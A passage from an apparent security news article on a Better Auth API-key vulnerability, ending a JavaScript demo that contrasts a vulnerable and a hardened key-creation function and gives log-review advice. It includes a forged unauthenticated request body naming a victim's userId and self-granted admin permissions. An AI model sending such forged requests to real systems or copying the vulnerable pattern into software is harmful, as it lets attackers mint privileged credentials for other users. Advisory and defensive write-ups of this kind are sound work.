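  return { status: 200, apiKey: issueApiKey(user, req.body) };
}

// Hardened pattern: a body-supplied userId is honoured only for a trusted
// server-side call (req.fromServer is set by the framework, never derived from
// the HTTP client), the user must exist in the store, and privileged fields come
// from server policy rather than from the request body.
const DEFAULT_PERMISSIONS = { admin: ['read', 'write'], member: ['read'] };
function createApiKeyHardened(req) {
  let user = null;
  if (req.session) {
    user = req.session.user;
  } else if (req.fromServer && req.body.userId) {
    user = USERS.get(req.body.userId) || null; // look up, never fabricate
  }
  if (!user) return { status: 401, error: 'UNAUTHORIZED' };
  const opts = { permissions: DEFAULT_PERMISSIONS[user.role] || [], rateLimitMax: 100 };
  return { status: 200, apiKey: issueApiKey(user, opts) };
}

// Constructed unauthenticated request of the kind the advisory describes: no
// session, a victim's id in the body, and self-chosen privileged fields.
const FORGED_REQUEST = {
  session: null,
  body: { userId: 'user-1', name: 'alice', permissions: ['read', 'write', 'admin'], rateLimitMax: 1000000 },
};

console.log('vulnerable:', JSON.stringify(createApiKeyVulnerable(FORGED_REQUEST)));
console.log('hardened:  ', JSON.stringify(createApiKeyHardened(FORGED_REQUEST)));
```

The log review the advisory recommends maps onto the same condition: a create or update call with no session cookie but a userId or privilege fields in the body is the request shape to hunt for.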


    The post Better Auth API keys Vulnerability Let Attackers Create Privileged Credentials For Arbitrary Users appeared first on Cyber Security News.
